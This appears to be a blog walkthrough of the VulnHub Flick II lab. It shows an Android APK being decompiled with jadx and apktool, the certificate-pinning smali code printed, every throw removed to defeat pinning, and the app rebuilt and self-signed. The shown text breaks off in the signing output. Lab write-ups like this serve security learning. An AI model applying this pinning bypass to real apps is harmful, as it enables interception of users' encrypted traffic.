vulnhub: flickII – a different approach – walkthrough part1

Hey,

Another vulnhub walkthrough, however this time a special one for me, because it required new special knowledge I just acquired.

Flick II on vulnhub: https://www.vulnhub.com/entry/flick-2,122/

Introduction to FlickII

I first grabbed FlickII when it was fresh in August 2015. I loved that it comes with an Android APK, that is the key to hack the VM!

So when you download and extract the VM image it is accompanied by an Android APK! Back in August 2015 I already figured out how to set up an Android Emulator and use burp to mitm Android apps!

However my plans were quickly dismissed when I learned that Certificate Pinning is common to secure the SSL Traffic between Android Apps and their API’s :-(

Before benching the VM for over a year I quickly checked the existing Walkthroughs but decided they were way to complicated for a “non-programmer” like myself…

Thanks SANS!

But thanks to this years SANS HolidayHackChallenge 2016 I learnt a great deal about hacking Android APKs!

So even before I start with the Writeup of the HolidayHackChallenge I needed to return to FlickII and apply my newly acquired skills on this VM!

The basic idea I had was that instead of diving too deep into the Android smali or decompiled Java code I would just hack out the Certificate Pinning! :-)

I loved the idea because once I manage to do this, this will be a highly useful skill for any further android application investigations!

So lets start with the writeup:

Walkthrough Part 1: From APK to Shell

First Order of Business: Setting it all up!

As already stated the VMs comes accompanied by an Android APK and a README file:

files

 

The README file gives us a nice mission:

mission

So cool! :-)

So without much explaining the basics – Detecting the IP of the VM after booting:

nmap-1

 

And a nmap script scan:

nmap-scriptscanning

Accessing the HTTPS Webserver gives an API Message:

first-api-call

 

What Android Emulator to use?

So now it is time to boot up an Android Emulator! I really like the Emulator from Android Studio so I used that one. However I have heard a lot good talk about Genymotion! So if you don’t want to install a whole Android IDE you might want to check out Genymotion!

I have not tried it yet (I really should) however when I first started with this over a year ago Genymotion required VirtualBox as a basis. But because i already have VMware Fusion running on my Mac I did not want to install another virtualization product that hooks my Network interfaces and all that stuff a Virtualization Software needs to do to work properly…

So if you are going the Android Studio route and use the Emulator for the first time you probably want to start the Android Virtual Device Manager:

  1. Start Android Studio
  2. Go To Tools -> Android -> AVD Manager:android-studio

 

3. Now you have a nice GUI to create a virtual android device to your liking: AVD Manager

avd-manager

Here I set up a phone in AVD Manager!

Once you have a Virtual Android Device set up you can easily start it anytime by a direct console command:

Starting the Emulator and Setting a Proxy (and scaling the emulator window)

/path/to/Library/Android/sdk/tools/emulator @testphone -http-proxy http://192.168.0.56:8080 -scale 250dpi

Just put an @ in front of the devices name you have set in AVD Manager. Also you can see here the command for setting a proxy and also for scaling the Emulator. In my case it was bigger than my Macbook Resolution so I wanted to reduce the dpi a bit.

Just play around with dpi values until the Window gets an acceptable size!

et voila – the emulator boots up:

emulator-booting

Once it is booted up you can install the flick-check-dist.apk using adb:

/path/to/Library/Android/sdk/platform-tools/adb install ~/Desktop/flick-check-dist.apk
1200 KB/s (1109803 bytes in 0.902s)
	pkg: /data/local/tmp/flick-check-dist.apk
Success

And you have a new program installed:

apk-installed

Starting FlickCheck it asks for the Server IP:

setting-server

When you start the Emulator without an HTTP Proxy you will see the App and can play around with it:

free

Now wouldn’t it be great to just MitM the HTTPS API Calls and send custom commands?

Turns out you can’t (just yet) :-(

connection-failed

Burp will show us the problem:

cert-pinning-error

 

So an SSL Client will tell the server why it does cancel the SSL negotiation, neat!

Second Order of Business: MitM the APK

So now I am as far as i was in August 2015 when I stopped with this VM! Luckily as said in the intro this years SANS Holiday Hack Challenge teached me how to circumvent this problem:

jadx-gui and apktool to the rescue \o/

One important lesson in IT-Security design is, that the client is hostile! So once you release a program into the wild you basically lose control over it!

Android Apps written in Java are very easy to reverse engineer!

The first thing with my newly aquired skills was to open the flick-check-dist.apk in jadx-gui (grab jadx here).

This will not just decompile to smali code but instead reconstruct an approximation of the initial Java Code.

Inside of this i quickly found the Function that performed the certificate pinning (the so called Trust Manager):

jadx-trust-manager

See the long PUB_KEY string? Thats the Certificate hash that is pinned!

Now how if we could just decompile the APK, change the program logic and then recompile and execute it!

Good thing we can with apktool!

Grab apktool here if you have not already downloaded it!
Now armed with apktool we can decompile the apk to smali code:

/path/to//apktool d ~/Desktop/flick-check-dist.apk 
I: Using Apktool 2.2.1 on flick-check-dist.apk
I: Loading resource table...
I: Decoding AndroidManifest.xml with resources...
I: Loading resource table from file: ./Library/apktool/framework/1.apk
I: Regular manifest package...
I: Decoding file-resources...
I: Decoding values */* XMLs...
I: Baksmaling classes.dex...
I: Copying assets and libs...
I: Copying unknown files...
I: Copying original files...

And now we got the decompiled application:

decompiled-smali-code

 

Directory listing of the decompiled smali folder

Now I asked myself the following questions:

a) How is the certificate Pinning implemented in the app?

This can easily be answered with jadx-gui! Searching for the PubKeyManager function name in the code…

search-trustmanager

…shows where it is being called:

pubkeymanager-functioncall

 

Now lets look at the smali code of PubKeyManager.smali:

MahcBook-Pro:flickcheck sebastianbrabetz$ cat PubKeyManager.smali 
.class public final Lcom/flick/flickcheck/PubKeyManager;
.super Ljava/lang/Object;
.source "PubKeyManager.java"

# interfaces
.implements Ljavax/net/ssl/X509TrustManager;


# static fields
.field static final synthetic $assertionsDisabled:Z

.field private static PUB_KEY:Ljava/lang/String;


# direct methods
.method static constructor ()V
    .locals 1

    .prologue
    .line 13
    const-class v0, Lcom/flick/flickcheck/PubKeyManager;

    invoke-virtual {v0}, Ljava/lang/Class;->desiredAssertionStatus()Z

    move-result v0

    if-nez v0, :cond_0

    const/4 v0, 0x1

    :goto_0
    sput-boolean v0, Lcom/flick/flickcheck/PubKeyManager;->$assertionsDisabled:Z

    .line 17
    const-string v0, "30820122300d06092a864886f70d01010105000382010f003082010a0282010100b7051e2040155a8e78903e325a8680bd680f0c9cbd164225422a6face762db4da9c7fa11687cc10fc1a20ea1e31260525145d5b18e2692e6e61e0b00d14e78fc62d031cafef90d9dc9599527beae644d1ce0af5b4ec21d405544a1c4a69fc39704e5897791c407f5e77c8bc195be7bcdb6fb30da1f2485d8853c9ce40ebc834e5d7c5c81f052ad03a57921aa940d6b928a0cee39979398e84d9cbf57565109f42f9634db46211f65b89fb9c7375e5a9810c0a89d10b7b6d9301eab716102e35ffe09ae29f764bc2527534e68381306fb7a984c208baa00090b65f4c44d0ace781cd9779130b9e4ea1a54c8bc3c1e9fa31855ebf57f72815775bba604ed6d41290203010001"

    sput-object v0, Lcom/flick/flickcheck/PubKeyManager;->PUB_KEY:Ljava/lang/String;

    return-void

    .line 13
    :cond_0
    const/4 v0, 0x0

    goto :goto_0
.end method

.method public constructor ()V
    .locals 0

    .prologue
    .line 13
    invoke-direct {p0}, Ljava/lang/Object;->()V

    return-void
.end method


# virtual methods
.method public checkClientTrusted([Ljava/security/cert/X509Certificate;Ljava/lang/String;)V
    .locals 0
    .param p1, "xcs"    # [Ljava/security/cert/X509Certificate;
    .param p2, "string"    # Ljava/lang/String;

    .prologue
    .line 71
    return-void
.end method

.method public checkServerTrusted([Ljava/security/cert/X509Certificate;Ljava/lang/String;)V
    .locals 6
    .param p1, "chain"    # [Ljava/security/cert/X509Certificate;
    .param p2, "authType"    # Ljava/lang/String;
    .annotation system Ldalvik/annotation/Throws;
        value = {
            Ljava/security/cert/CertificateException;
        }
    .end annotation

    .prologue
    .line 32
    sget-boolean v3, Lcom/flick/flickcheck/PubKeyManager;->$assertionsDisabled:Z

    if-nez v3, :cond_0

    if-nez p1, :cond_0

    new-instance v3, Ljava/lang/AssertionError;

    invoke-direct {v3}, Ljava/lang/AssertionError;->()V

    throw v3

    .line 33
    :cond_0
    if-nez p1, :cond_1

    .line 34
    new-instance v3, Ljava/lang/IllegalArgumentException;

    const-string v4, "checkServerTrusted: X509Certificate array is null"

    invoke-direct {v3, v4}, Ljava/lang/IllegalArgumentException;->(Ljava/lang/String;)V

    throw v3

    .line 38
    :cond_1
    sget-boolean v3, Lcom/flick/flickcheck/PubKeyManager;->$assertionsDisabled:Z

    if-nez v3, :cond_2

    array-length v3, p1

    if-gtz v3, :cond_2

    new-instance v3, Ljava/lang/AssertionError;

    invoke-direct {v3}, Ljava/lang/AssertionError;->()V

    throw v3

    .line 39
    :cond_2
    array-length v3, p1

    if-gtz v3, :cond_3

    .line 40
    new-instance v3, Ljava/lang/IllegalArgumentException;

    const-string v4, "checkServerTrusted: X509Certificate is empty"

    invoke-direct {v3, v4}, Ljava/lang/IllegalArgumentException;->(Ljava/lang/String;)V

    throw v3

    .line 54
    :cond_3
    const/4 v3, 0x0

    aget-object v3, p1, v3

    invoke-virtual {v3}, Ljava/security/cert/X509Certificate;->getPublicKey()Ljava/security/PublicKey;

    move-result-object v2

    check-cast v2, Ljava/security/interfaces/RSAPublicKey;

    .line 55
    .local v2, "pubkey":Ljava/security/interfaces/RSAPublicKey;
    new-instance v3, Ljava/math/BigInteger;

    const/4 v4, 0x1

    invoke-interface {v2}, Ljava/security/interfaces/RSAPublicKey;->getEncoded()[B

    move-result-object v5

    invoke-direct {v3, v4, v5}, Ljava/math/BigInteger;->(I[B)V

    const/16 v4, 0x10

    invoke-virtual {v3, v4}, Ljava/math/BigInteger;->toString(I)Ljava/lang/String;

    move-result-object v0

    .line 59
    .local v0, "encoded":Ljava/lang/String;
    sget-object v3, Lcom/flick/flickcheck/PubKeyManager;->PUB_KEY:Ljava/lang/String;

    invoke-virtual {v3, v0}, Ljava/lang/String;->equalsIgnoreCase(Ljava/lang/String;)Z

    move-result v1

    .line 60
    .local v1, "expected":Z
    sget-boolean v3, Lcom/flick/flickcheck/PubKeyManager;->$assertionsDisabled:Z

    if-nez v3, :cond_4

    if-nez v1, :cond_4

    new-instance v3, Ljava/lang/AssertionError;

    invoke-direct {v3}, Ljava/lang/AssertionError;->()V

    throw v3

    .line 61
    :cond_4
    if-nez v1, :cond_5

    .line 62
    new-instance v3, Ljava/security/cert/CertificateException;

    new-instance v4, Ljava/lang/StringBuilder;

    invoke-direct {v4}, Ljava/lang/StringBuilder;->()V

    const-string v5, "checkServerTrusted: Expected public key: "

    invoke-virtual {v4, v5}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;

    move-result-object v4

    sget-object v5, Lcom/flick/flickcheck/PubKeyManager;->PUB_KEY:Ljava/lang/String;

    invoke-virtual {v4, v5}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;

    move-result-object v4

    const-string v5, ", got public key:"

    invoke-virtual {v4, v5}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;

    move-result-object v4

    invoke-virtual {v4, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;

    move-result-object v4

    invoke-virtual {v4}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;

    move-result-object v4

    invoke-direct {v3, v4}, Ljava/security/cert/CertificateException;->(Ljava/lang/String;)V

    throw v3

    .line 66
    :cond_5
    return-void
.end method

.method public getAcceptedIssuers()[Ljava/security/cert/X509Certificate;
    .locals 1

    .prologue
    .line 76
    const/4 v0, 0x0

    return-object v0
.end method

So goto, much complex, such complicated, so wow!

This brings the next question:

b) How to disable the Certificate Pinning check?

Lets look closely again at the code that calls the PubKeyManager() function in jadx:

functioncall2Aha an exception catcher logic!

Once again the PubKeyManager Function:

pubkeymanager2

 

So the program logic is, that everything works well as long as the PubKeyManager() Function does not throw an exception!

Now what did i see all over the smali code of the PubKeyManager.smali file?

 new-instance v3, Ljava/lang/AssertionError;

    invoke-direct {v3}, Ljava/lang/AssertionError;->()V

    throw v3

Crazy thought: What if I just remove all “throw” statements in the PubKeyManager.smali file?

The resulting code looks like this:

MahcBook-Pro:flickcheck sebastianbrabetz$ cat PubKeyManager.smali 
.class public final Lcom/flick/flickcheck/PubKeyManager;
.super Ljava/lang/Object;
.source "PubKeyManager.java"

# interfaces
.implements Ljavax/net/ssl/X509TrustManager;


# static fields
.field static final synthetic $assertionsDisabled:Z

.field private static PUB_KEY:Ljava/lang/String;


# direct methods
.method static constructor ()V
    .locals 1

    .prologue
    .line 13
    const-class v0, Lcom/flick/flickcheck/PubKeyManager;

    invoke-virtual {v0}, Ljava/lang/Class;->desiredAssertionStatus()Z

    move-result v0

    if-nez v0, :cond_0

    const/4 v0, 0x1

    :goto_0
    sput-boolean v0, Lcom/flick/flickcheck/PubKeyManager;->$assertionsDisabled:Z

    .line 17
    const-string v0, "30820122300d06092a864886f70d01010105000382010f003082010a0282010100b7051e2040155a8e78903e325a8680bd680f0c9cbd164225422a6face762db4da9c7fa11687cc10fc1a20ea1e31260525145d5b18e2692e6e61e0b00d14e78fc62d031cafef90d9dc9599527beae644d1ce0af5b4ec21d405544a1c4a69fc39704e5897791c407f5e77c8bc195be7bcdb6fb30da1f2485d8853c9ce40ebc834e5d7c5c81f052ad03a57921aa940d6b928a0cee39979398e84d9cbf57565109f42f9634db46211f65b89fb9c7375e5a9810c0a89d10b7b6d9301eab716102e35ffe09ae29f764bc2527534e68381306fb7a984c208baa00090b65f4c44d0ace781cd9779130b9e4ea1a54c8bc3c1e9fa31855ebf57f72815775bba604ed6d41290203010001"

    sput-object v0, Lcom/flick/flickcheck/PubKeyManager;->PUB_KEY:Ljava/lang/String;

    return-void

    .line 13
    :cond_0
    const/4 v0, 0x0

    goto :goto_0
.end method

.method public constructor ()V
    .locals 0

    .prologue
    .line 13
    invoke-direct {p0}, Ljava/lang/Object;->()V

    return-void
.end method


# virtual methods
.method public checkClientTrusted([Ljava/security/cert/X509Certificate;Ljava/lang/String;)V
    .locals 0
    .param p1, "xcs"    # [Ljava/security/cert/X509Certificate;
    .param p2, "string"    # Ljava/lang/String;

    .prologue
    .line 71
    return-void
.end method

.method public checkServerTrusted([Ljava/security/cert/X509Certificate;Ljava/lang/String;)V
    .locals 6
    .param p1, "chain"    # [Ljava/security/cert/X509Certificate;
    .param p2, "authType"    # Ljava/lang/String;
    .annotation system Ldalvik/annotation/Throws;
        value = {
            Ljava/security/cert/CertificateException;
        }
    .end annotation

    .prologue
    .line 32
    sget-boolean v3, Lcom/flick/flickcheck/PubKeyManager;->$assertionsDisabled:Z

    if-nez v3, :cond_0

    if-nez p1, :cond_0

    new-instance v3, Ljava/lang/AssertionError;

    invoke-direct {v3}, Ljava/lang/AssertionError;->()V

    .line 33
    :cond_0
    if-nez p1, :cond_1

    .line 34
    new-instance v3, Ljava/lang/IllegalArgumentException;

    const-string v4, "checkServerTrusted: X509Certificate array is null"

    invoke-direct {v3, v4}, Ljava/lang/IllegalArgumentException;->(Ljava/lang/String;)V

    .line 38
    :cond_1
    sget-boolean v3, Lcom/flick/flickcheck/PubKeyManager;->$assertionsDisabled:Z

    if-nez v3, :cond_2

    array-length v3, p1

    if-gtz v3, :cond_2

    new-instance v3, Ljava/lang/AssertionError;

    invoke-direct {v3}, Ljava/lang/AssertionError;->()V

    .line 39
    :cond_2
    array-length v3, p1

    if-gtz v3, :cond_3

    .line 40
    new-instance v3, Ljava/lang/IllegalArgumentException;

    const-string v4, "checkServerTrusted: X509Certificate is empty"

    invoke-direct {v3, v4}, Ljava/lang/IllegalArgumentException;->(Ljava/lang/String;)V

    .line 54
    :cond_3
    const/4 v3, 0x0

    aget-object v3, p1, v3

    invoke-virtual {v3}, Ljava/security/cert/X509Certificate;->getPublicKey()Ljava/security/PublicKey;

    move-result-object v2

    check-cast v2, Ljava/security/interfaces/RSAPublicKey;

    .line 55
    .local v2, "pubkey":Ljava/security/interfaces/RSAPublicKey;
    new-instance v3, Ljava/math/BigInteger;

    const/4 v4, 0x1

    invoke-interface {v2}, Ljava/security/interfaces/RSAPublicKey;->getEncoded()[B

    move-result-object v5

    invoke-direct {v3, v4, v5}, Ljava/math/BigInteger;->(I[B)V

    const/16 v4, 0x10

    invoke-virtual {v3, v4}, Ljava/math/BigInteger;->toString(I)Ljava/lang/String;

    move-result-object v0

    .line 59
    .local v0, "encoded":Ljava/lang/String;
    sget-object v3, Lcom/flick/flickcheck/PubKeyManager;->PUB_KEY:Ljava/lang/String;

    invoke-virtual {v3, v0}, Ljava/lang/String;->equalsIgnoreCase(Ljava/lang/String;)Z

    move-result v1

    .line 60
    .local v1, "expected":Z
    sget-boolean v3, Lcom/flick/flickcheck/PubKeyManager;->$assertionsDisabled:Z

    if-nez v3, :cond_4

    if-nez v1, :cond_4

    new-instance v3, Ljava/lang/AssertionError;

    invoke-direct {v3}, Ljava/lang/AssertionError;->()V

    .line 61
    :cond_4
    if-nez v1, :cond_5

    .line 62
    new-instance v3, Ljava/security/cert/CertificateException;

    new-instance v4, Ljava/lang/StringBuilder;

    invoke-direct {v4}, Ljava/lang/StringBuilder;->()V

    const-string v5, "checkServerTrusted: Expected public key: "

    invoke-virtual {v4, v5}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;

    move-result-object v4

    sget-object v5, Lcom/flick/flickcheck/PubKeyManager;->PUB_KEY:Ljava/lang/String;

    invoke-virtual {v4, v5}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;

    move-result-object v4

    const-string v5, ", got public key:"

    invoke-virtual {v4, v5}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;

    move-result-object v4

    invoke-virtual {v4, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;

    move-result-object v4

    invoke-virtual {v4}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;

    move-result-object v4

    invoke-direct {v3, v4}, Ljava/security/cert/CertificateException;->(Ljava/lang/String;)V

    .line 66
    :cond_5
    return-void
.end method

.method public getAcceptedIssuers()[Ljava/security/cert/X509Certificate;
    .locals 1

    .prologue
    .line 76
    const/4 v0, 0x0

    return-object v0
.end method

No more exceptions beeing thrown that can be catched \o/

Now packing this up again with apktool:

MahcBook-Pro:temp sebastianbrabetz$ ../path/to/apktool b flick-check-dist/ -o flick-hacked.apk
I: Using Apktool 2.2.1
I: Checking whether sources has changed...
I: Smaling smali folder into classes.dex...
I: Checking whether resources has changed...
I: Building resources...
I: Building apk file...
I: Copying unknown files/dir...
MahcBook-Pro:temp sebastianbrabetz$ ls -l
total 2128
drwxr-xr-x  8 sebastianbrabetz  staff      272 25 Dez 17:13 flick-check-dist
-rw-r--r--  1 sebastianbrabetz  staff  1086587 25 Dez 17:13 flick-hacked.apk

Now lets uninstall the original application:

uninstall-orig-app

 

And install the our newly compiled, certificate pinning free BadBoy:

MahcBook-Pro:temp sebastianbrabetz$ /path/to/Library/Android/sdk/platform-tools/adb install ~/temp/flick-hacked.apk 
963 KB/s (1086587 bytes in 1.101s)
	pkg: /data/local/tmp/flick-hacked.apk
Failure [INSTALL_PARSE_FAILED_NO_CERTIFICATES]

Yet another problem! We first need to sign the APK (a selfsigned cert will suffice).

Here are 2 Simple steps to create yourself a certificate keystore and sign with it:

1. keystore erstellen (osx):
keytool -genkey -keystore (name).keystore -validity 10000 -alias (name)

2. sign app:
jarsigner -keystore (keystorenamename).keystore -verbose APK-NAME.apk (keystorename)

In my case it looks like this:

MahcBook-Pro:temp sebastianbrabetz$ jarsigner -keystore ~/path/to/test.keystore -verbose flick-hacked.apk test
Enter Passphrase for keystore: ******
   adding: META-INF/MANIFEST.MF
   adding: META-INF/TEST.SF
   adding: META-INF/TEST.DSA
  signing: AndroidManifest.xml
  signing: classes.dex
  signing: res/anim/abc_fade_in.xml
  signing: res/anim/abc_fade_out.xml
  signing: res/anim/abc_grow_fade_in_from_bottom.xml
  signing: res/anim/abc_shrink_fade_out_from_bottom.xml
  signing: res/anim/abc_slide_in_bottom.xml
  signing: res/anim/abc_slide_in_top.xml
  signing: res/anim/abc_slide_out_bottom.xml
  signing: res/anim/abc_slide_out_top.xml
  signing: res/color/abc_background_cache_hint_selector_material_dark.xml
  signing: res/color/abc_background_cache_hint_selector_material_light.xml
  signing: res/color/abc_primary_text_disable_only_material_dark.xml
  signing: res/color/abc_primary_text_disable_only_material_light.xml
  signing: res/color/abc_primary_text_material_dark.xml
  signing: res/color/abc_primary_text_material_light.xml
  signing: res/color/abc_search_url_text.xml
  signing: res/color/abc_secondary_text_material_dark.xml
  signing: res/color/abc_secondary_text_material_light.xml
  signing: res/drawable-hdpi-v4/abc_ab_share_pack_mtrl_alpha.9.png
  signing: res/drawable-hdpi-v4/abc_btn_check_to_on_mtrl_000.png
  signing: res/drawable-hdpi-v4/abc_btn_check_to_on_mtrl_015.png
  signing: res/drawable-hdpi-v4/abc_btn_radio_to_on_mtrl_000.png
  signing: res/drawable-hdpi-v4/abc_btn_radio_to_on_mtrl_015.png
  signing: res/drawable-hdpi-v4/abc_btn_rating_star_off_mtrl_alpha.png
  signing: res/drawable-hdpi-v4/abc_btn_rating_star_on_mtrl_alpha.png
  signing: res/drawable-hdpi-v4/abc_btn_switch_to_on_mtrl_00001.9.png
  signing: res/drawable-hdpi-v4/abc_btn_switch_to_on_mtrl_00012.9.png
  signing: res/drawable-hdpi-v4/abc_cab_background_top_mtrl_alpha.9.png
  signing: res/drawable-hdpi-v4/abc_ic_ab_back_mtrl_am_alpha.png
  signing: res/drawable-hdpi-v4/abc_ic_clear_mtrl_alpha.png
  signing: res/drawable-hdpi-v4/abc_ic_commit_search_api_mtrl_alpha.png
  signing: res/drawable-hdpi-v4/abc_ic_go_search_api_mtrl_alpha.png
  signing: res/drawable-hdpi-v4/abc_ic_menu_copy_mtrl_am_alpha.png
  signing: res/drawable-hdpi-v4/abc_ic_menu_cut_mtrl_alpha.png
  signing: res/drawable-hdpi-v4/abc_ic_menu_moreoverflow_mtrl_alpha.png
  signing: res/drawable-hdpi-v4/abc_ic_menu_paste_mtrl_am_alpha.png
  signing: res/drawable-hdpi-v4/abc_ic_menu_selectall_mtrl_alpha.png
  signing: res/drawable-hdpi-v4/abc_ic_menu_share_mtrl_alpha.png
  signing: res/drawable-hdpi-v4/abc_ic_search_api_mtrl_alpha.png
  signing: res/drawable-hdpi-v4/abc_ic_voice_search_api_mtrl_alpha.png
  signing: res/drawable-hdpi-v4/abc_list_divider_mtrl_alpha.9.png
  signing: res/drawable-hdpi-v4/abc_list_focused_holo.9.png
  signing: res/drawable-hdpi-v4/abc_list_longpressed_holo.9.png
  signing: res/drawable-hdpi-v4/abc_list_pressed_holo_dark.9.png
  signing: res/drawable-hdpi-v4/abc_list_pressed_holo_light.9.png
  signing: res/drawable-hdpi-v4/abc_list_selector_disabled_holo_dark.9.png
  signing: res/drawable-hdpi-v4/abc_list_selector_disabled_holo_light.9.png
  signing: res/drawable-hdpi-v4/abc_menu_hardkey_panel_mtrl_mult.9.png
  signing: res/drawable-hdpi-v4/abc_popup_background_mtrl_mult.9.png
  signing: res/drawable-hdpi-v4/abc_spinner_mtrl_am_alpha.9.png
  signing: res/drawable-hdpi-v4/abc_switch_track_mtrl_alpha.9.png
  signing: res/drawable-hdpi-v4/abc_tab_indicator_mtrl_alpha.9.png
  signing: res/drawable-hdpi-v4/abc_textfield_activated_mtrl_alpha.9.png
  signing: res/drawable-hdpi-v4/abc_textfield_default_mtrl_alpha.9.png
  signing: res/drawable-hdpi-v4/abc_textfield_search_activated_mtrl_alpha.9.png
  signing: res/drawable-hdpi-v4/abc_textfield_search_default_mtrl_alpha.9.png
  signing: res/drawable-ldrtl-hdpi-v17/abc_ic_ab_back_mtrl_am_alpha.png
  signing: res/drawable-ldrtl-hdpi-v17/abc_ic_menu_copy_mtrl_am_alpha.png
  signing: res/drawable-ldrtl-hdpi-v17/abc_ic_menu_cut_mtrl_alpha.png
  signing: res/drawable-ldrtl-hdpi-v17/abc_spinner_mtrl_am_alpha.9.png
  signing: res/drawable-ldrtl-mdpi-v17/abc_ic_ab_back_mtrl_am_alpha.png
  signing: res/drawable-ldrtl-mdpi-v17/abc_ic_menu_copy_mtrl_am_alpha.png
  signing: res/drawable-ldrtl-mdpi-v17/abc_ic_menu_cut_mtrl_alpha.png
  signing: res/drawable-ldrtl-mdpi-v17/abc_spinner_mtrl_am_alpha.9.png
  signing: res/drawable-ldrtl-xhdpi-v17/abc_ic_ab_back_mtrl_am_alpha.png
  signing: res/drawable-ldrtl-xhdpi-v17/abc_ic_menu_copy_mtrl_am_alpha.png
  signing: res/drawable-ldrtl-xhdpi-v17/abc_ic_menu_cut_mtrl_alpha.png
  signing: res/drawable-ldrtl-xhdpi-v17/abc_spinner_mtrl_am_alpha.9.png
  signing: res/drawable-ldrtl-xxhdpi-v17/abc_ic_ab_back_mtrl_am_alpha.png
  signing: res/drawable-ldrtl-xxhdpi-v17/abc_ic_menu_copy_mtrl_am_alpha.png
  signing: res/drawable-ldrtl-xxhdpi-v17/abc_ic_menu_cut_mtrl_alpha.png
  signing: res/drawable-ldrtl-xxhdpi-v17/abc_spinner_mtrl_am_alpha.9.png
  signing: res/drawable-ldrtl-xxxhdpi-v17/abc_ic_ab_back_mtrl_am_alpha.png
  signing: res/drawable-ldrtl-xxxhdpi-v17/abc_ic_menu_copy_mtrl_am_alpha.png
  signing: res/drawable-ldrtl-xxxhdpi-v17/abc_ic_menu_cut_mtrl_alpha.png
  signing: res/drawable-ldrtl-xxxhdpi-v17/abc_spinner_mtrl_am_alpha.9.png
  signing: res/drawable-mdpi-v4/abc_ab_share_pack_mtrl_alpha.9.png
  signing: res/drawable-mdpi-v4/abc_btn_check_to_on_mtrl_000.png
  signing: res/drawable-mdpi-v4/abc_btn_check_to_on_mtrl_015.png
  signing: res/drawable-mdpi-v4/abc_btn_radio_to_on_mtrl_000.png
  signing: res/drawable-mdpi-v4/abc_btn_radio_to_on_mtrl_015.png
  signing: res/drawable-mdpi-v4/abc_btn_rating_star_off_mtrl_alpha.png
  signing: res/drawable-mdpi-v4/abc_btn_rating_star_on_mtrl_alpha.png
  signing: res/drawable-mdpi-v4/abc_btn_switch_to_on_mtrl_00001.9.png
  signing: res/drawable-mdpi-v4/abc_btn_switch_to_on_mtrl_00012.9.png
  signing: res/drawable-mdpi-v4/abc_cab_background_top_mtrl_alpha.9.png
  signing: res/drawable-mdpi-v4/abc_ic_ab_back_mtrl_am_alpha.png
  signing: res/drawable-mdpi-v4/abc_ic_clear_mtrl_alpha.png
  signing: res/drawable-mdpi-v4/abc_ic_commit_search_api_mtrl_alpha.png
  signing: res/drawable-mdpi-v4/abc_ic_go_search_api_mtrl_alpha.png
  signing: res/drawable-mdpi-v4/abc_ic_menu_copy_mtrl_am_alpha.png
  signing: res/drawable-mdpi-v4/abc_ic_menu_cut_mtrl_alpha.png
  signing: res/drawable-mdpi-v4/abc_ic_menu_moreoverflow_mtrl_alpha.png
  signing: res/drawable-mdpi-v4/abc_ic_menu_paste_mtrl_am_alpha.png
  signing: res/drawable-mdpi-v4/abc_ic_menu_selectall_mtrl_alpha.png
  signing: res/drawable-mdpi-v4/abc_ic_menu_share_mtrl_alpha.png
  signing: res/drawable-mdpi-v4/abc_ic_search_api_mtrl_alpha.png
  signing: res/drawable-mdpi-v4/abc_ic_voice_search_api_mtrl_alpha.png
  signing: res/drawable-mdpi-v4/abc_list_divider_mtrl_alpha.9.png
  signing: res/drawable-mdpi-v4/abc_list_focused_holo.9.png
  signing: res/drawable-mdpi-v4/abc_list_longpressed_holo.9.png
  signing: res/drawable-mdpi-v4/abc_list_pressed_holo_dark.9.png
  signing: res/drawable-mdpi-v4/abc_list_pressed_holo_light.9.png
  signing: res/drawable-mdpi-v4/abc_list_selector_disabled_holo_dark.9.png
  signing: res/drawable-mdpi-v4/abc_list_selector_disabled_holo_light.9.png
  signing: res/drawable-mdpi-v4/abc_menu_hardkey_panel_mtrl_mult.9.png
  signing: res/drawable-mdpi-v4/abc_popup_background_mtrl_mult.9.png
  signing: res/drawable-mdpi-v4/abc_spinner_mtrl_am_alpha.9.png
  signing: res/drawable-mdpi-v4/abc_switch_track_mtrl_alpha.9.png
  signing: res/drawable-mdpi-v4/abc_tab_indicator_mtrl_alpha.9.png
  signing: res/drawable-mdpi-v4/abc_textfield_activated_mtrl_alpha.9.png
  signing: res/drawable-mdpi-v4/abc_textfield_default_mtrl_alpha.9.png
  signing: res/drawable-mdpi-v4/abc_textfield_search_activated_mtrl_alpha.9.png
  signing: res/drawable-mdpi-v4/abc_textfield_search_default_mtrl_alpha.9.png
  signing: res/drawable-tvdpi-v4/abc_btn_switch_to_on_mtrl_00001.9.png
  signing: res/drawable-tvdpi-v4/abc_btn_switch_to_on_mtrl_00012.9.png
  signing: res/drawable-v21/abc_cab_background_top_material.xml
  signing: res/drawable-xhdpi-v4/abc_ab_share_pack_mtrl_alpha.9.png
  signing: res/drawable-xhdpi-v4/abc_btn_check_to_on_mtrl_000.png
  signing: res/drawable-xhdpi-v4/abc_btn_check_to_on_mtrl_015.png
  signing: res/drawable-xhdpi-v4/abc_btn_radio_to_on_mtrl_000.png
  signing: res/drawable-xhdpi-v4/abc_btn_radio_to_on_mtrl_015.png
  signing: res/drawable-xhdpi-v4/abc_btn_rating_star_off_mtrl_alpha.png
  signing: res/drawable-xhdpi-v4/abc_btn_rating_star_on_mtrl_alpha.png
  signing: res/drawable-xhdpi-v4/abc_btn_switch_to_on_mtrl_00001.9.png
  signing: res/drawable-xhdpi-v4/abc_btn_switch_to_on_mtrl_00012.9.png
  signing: res/drawable-xhdpi-v4/abc_cab_background_top_mtrl_alpha.9.png
  signing: res/drawable-xhdpi-v4/abc_ic_ab_back_mtrl_am_alpha.png
  signing: res/drawable-xhdpi-v4/abc_ic_clear_mtrl_alpha.png
  signing: res/drawable-xhdpi-v4/abc_ic_commit_search_api_mtrl_alpha.png
  signing: res/drawable-xhdpi-v4/abc_ic_go_search_api_mtrl_alpha.png
  signing: res/drawable-xhdpi-v4/abc_ic_menu_copy_mtrl_am_alpha.png
  signing: res/drawable-xhdpi-v4/abc_ic_menu_cut_mtrl_alpha.png
  signing: res/drawable-xhdpi-v4/abc_ic_menu_moreoverflow_mtrl_alpha.png
